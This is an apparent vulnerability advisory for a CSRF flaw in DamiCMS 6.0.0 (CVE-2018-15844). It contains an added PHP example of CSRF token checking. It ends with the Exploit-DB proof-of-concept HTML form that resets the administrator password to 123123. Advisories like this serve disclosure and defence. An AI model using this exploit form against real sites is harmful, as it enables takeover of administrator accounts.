Vendor: DamiCMS
Author: Autism_JH
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: DamiCMS
Affected Version From: 6.0.0
Affected Version To: 6.0.0
Patch Exists: NO
Related CVE: CVE-2018-15844
CPE: a:damicms:damicms:6.0.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2018

DamiCMS 6.0.0 – Cross-Site Request Forgery (Change Admin Password)

DamiCMS v6.0.0 allows CSRF to change the administrator account's password. If the administrator opens the PoC page after logging in, the administrator account's password is changed to 123123.

Mitigation:

Implementing a CSRF token in the application can help mitigate this vulnerability.
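
One way to implement the token check named in the mitigation, as an added example that is not DamiCMS code and not part of the original advisory. The function names and the `csrf_token` field name are hypothetical, and plain arrays stand in for `$_SESSION` and `$_POST` so the script runs from the PHP CLI.

```php
<?php
// Added example: session-bound CSRF token for a state-changing admin form.
// All function and field names here are hypothetical, not DamiCMS identifiers.

function csrf_token(array &$session): string
{
    // One unpredictable token per session, created on first use.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_field(array &$session): string
{
    // Hidden field the server renders into its own edit form. A page on
    // another origin cannot read this value, so it cannot replay it.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '" />';
}

function csrf_verify(array $session, string $method, array $post): bool
{
    // State changes are accepted over POST only.
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject missing tokens and array-typed input such as csrf_token[]=x.
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false;
    }
    // Constant-time comparison of the session token and the submitted one.
    return hash_equals($expected, $supplied);
}

// Constructed demonstration: $session and the two bodies are sample data.
$session = [];
$token   = csrf_token($session);
$forged  = ['username' => 'admin', 'password' => '123123', 'role_id' => '1', 'id' => '1'];
$legit   = ['username' => 'admin', 'password' => 'constructed-value', 'role_id' => '1',
            'id' => '1', 'csrf_token' => $token];

echo 'cross-site form without token accepted: ';
var_dump(csrf_verify($session, 'POST', $forged));
echo 'same-site form with session token accepted: ';
var_dump(csrf_verify($session, 'POST', $legit));
```

The handler behind the edit form would call `csrf_verify()` before touching the account record and reject the request when it returns false.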

Exploit-DB raw data:

# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
# Author: Autism_JH
# Date: 2018-08-30
# Vendor Homepage: https://github.com/731276192/damicms
# Software Link: https://github.com/731276192/damicms
# Version: 6.0.0
# CVE: CVE-2018-15844

# Description:
# DamiCMS v6.0.0 allows CSRF to change the administrator account's password.
# After the administrator logs in and opens the PoC, the administrator account's
# password will be changed to 123123

# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
			<input type="hidden" name="username" value="admin" />
			<input type="hidden" name="password" value="123123" />
			<input type="hidden" name="role&#95;id" value="1" />
			<input type="hidden" name="id" value="1" />
			<input type="hidden" name="Submit" value="ç&#161;&#174;å&#174;&#154;ä&#191;&#174;æ&#148;&#185;" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>